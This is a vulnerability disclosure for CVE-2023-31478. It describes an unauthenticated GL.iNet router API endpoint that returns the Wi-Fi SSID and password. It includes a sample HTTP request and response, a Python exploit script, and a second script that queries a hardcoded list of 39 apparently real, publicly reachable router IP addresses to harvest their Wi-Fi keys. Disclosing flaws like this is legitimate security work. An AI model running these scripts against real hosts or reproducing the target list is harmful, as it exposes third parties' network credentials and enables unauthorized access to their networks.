Headline
CVE-2023-31478: CVE-issues/SSID_Key_Disclosure.md at main · gl-inet/CVE-issues
An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.
GL.iNET SSID Key Disclosure
CVSS Score - 8.3, High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L)
Overview - An API endpoint for all GL.iNET devices reveals information about the WiFi configuration, including SSID and key. This endpoint can be accessed without any sort of authentication (although the 4.x firmware claims authentication is required). Affects versions <= 3.215. Example request and response below:
POST /api/router/mesh/status HTTP/1.1 Host: 192.168.8.1 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 4
mac=
HTTP/1.1 200 OK Content-Type: application/json Content-Length: 143 Connection: close Date: Thu, 29 Dec 2022 21:51:13 GMT Server: lighttpd/1.4.48
{"del":"0","led":"1","led_sync":"0","wifi_sync":"0","ssid":"GL-XE300-343","key":"goodlife","encryption":"psk2","version":"3.214","code":0}
- Description - The endpoint /api/router/mesh/status is not listed in the front-end of the web GUI for all GL.iNET devices
- Steps to reproduce - run the Proof of Concept in the PoC section below using python3 exploit.py <domain/IP>, such as python3 exploit.py 192.168.8.1. Information will be returned such as {’del’: '0’, 'led’: '1’, 'led_sync’: '0’, 'disabled’: '2G’, 'wifi_sync’: '0’, 'ssid’: 'GL-XE300-343’, 'key’: 'goodlife’, 'encryption’: 'psk2’, 'version’: '3.215’, 'code’: 0}
- Impact
- Since this exploit isn’t very useful in default configurations for GL.iNET devices, a section on impact is needed. By default (on the device I’ve looked at), firewall rules block anything coming from the WAN side, meaning the only way to access the Web GUI is to already be on the LAN, which means the SSID key is already known.
- However, this exploit is still relevant in non-standard configurations, such as ones where access to the Web GUI is enabled without having to be on the LAN (such as opening up the WAN firewall). This may allow an attacker to connect to the internal LAN.
- In addition, the SSID key may be related to (or the same as) the admin password for the Web GUI. In this case, sending a simple request would give you admin access to the router.
- As an example of these scenarios, I’ve compiled a short list of publicly-available GL.iNET Web GUIs that don’t require LAN access in the Impact PoC section. Note that a search on Shodan gives over 1000 results, but only 39 are included in the Python script. A majority of the IPs listed allow me to list the SSID key for their LAN. While I won’t test for ethical reasons, there is a high chance that at least some of them are related to/the same as the admin password for the router.
- This means that there are at least 1300 vulnerable GL.iNET routers available from anyone around the world, with many more in other scenarios.
PoC
import requests, sys import warnings warnings.filterwarnings(“ignore”)
## Get arguments if (len(sys.argv) < 2): print(“Usage: python3 exploit.py <domain/IP>”) sys.exit(1)
url = sys.argv[1]
## Send request data = “mac=” headers = {’Content-Type’: 'application/x-www-form-urlencoded’} response = requests.request("POST", "https://"+url+"/api/router/mesh/status", verify=False, timeout=4, data=data, headers=headers)
## Check response try: print(response.json()) except: print("[-] Machine not vulnerable, error was encountered")
Impact PoC
import requests, sys import warnings warnings.filterwarnings(“ignore”)
IPs = ["108.90.205.128", "109.90.119.187", "162.118.7.19:8443", "166.153.75.58", "173.72.170.60", "174.101.235.57", "185.62.151.240", "188.192.44.98", "194.37.97.59", "213.47.44.62", "216.162.194.32", "217.160.53.88", "37.80.213.8", "46.160.245.44", "50.28.223.226", "5.249.24.230", "60.241.22.108", "62.112.81.5", "63.46.29.137", "67.205.142.193", "68.160.163.70", "69.216.97.59", "72.250.53.61", "72.250.55.133", "74.72.184.86", "76.141.243.253", "76.84.210.156", "79.246.120.55", "80.151.80.107", "84.133.182.125", "84.141.234.241", "84.182.144.144", "89.238.176.15", "92.6.13.152", "93.46.98.210:8443", "94.79.171.10", "98.207.137.184", "99.226.73.153", “99.228.41.240:8443”]
for ip in IPs: ## Send request data = “mac=” headers = {’Content-Type’: 'application/x-www-form-urlencoded’} response = requests.request("POST", "https://"+ip+"/api/router/mesh/status", verify=False, timeout=4, data=data, headers=headers)
\## Check response
try:
print(response.json())
except:
print("\[-\] Machine not vulnerable, error was encountered")